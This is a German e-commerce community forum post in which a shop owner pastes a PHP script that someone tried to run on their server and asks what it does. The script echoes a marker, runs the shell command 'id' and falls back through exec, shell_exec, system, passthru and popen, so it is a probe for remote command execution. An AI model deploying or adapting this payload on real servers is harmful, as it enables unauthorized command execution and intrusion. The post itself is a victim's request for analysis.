Jump to content
xt:Commerce Community Forum

Weiß jemand, was das macht?


Strubbel

Recommended Posts

Hallo Zusammen,

heut hat mal wieder ein Witzbold versucht irgendwas bei uns aufzurufen/auszuführen.

Weiß jemand von Euch, was folgendes Script bewirken soll?

<?php

echo "Mic22";

$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}

exit;

Wäre toll, wenn mir das jemand übersetzen könnte :D
Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
  • Create New...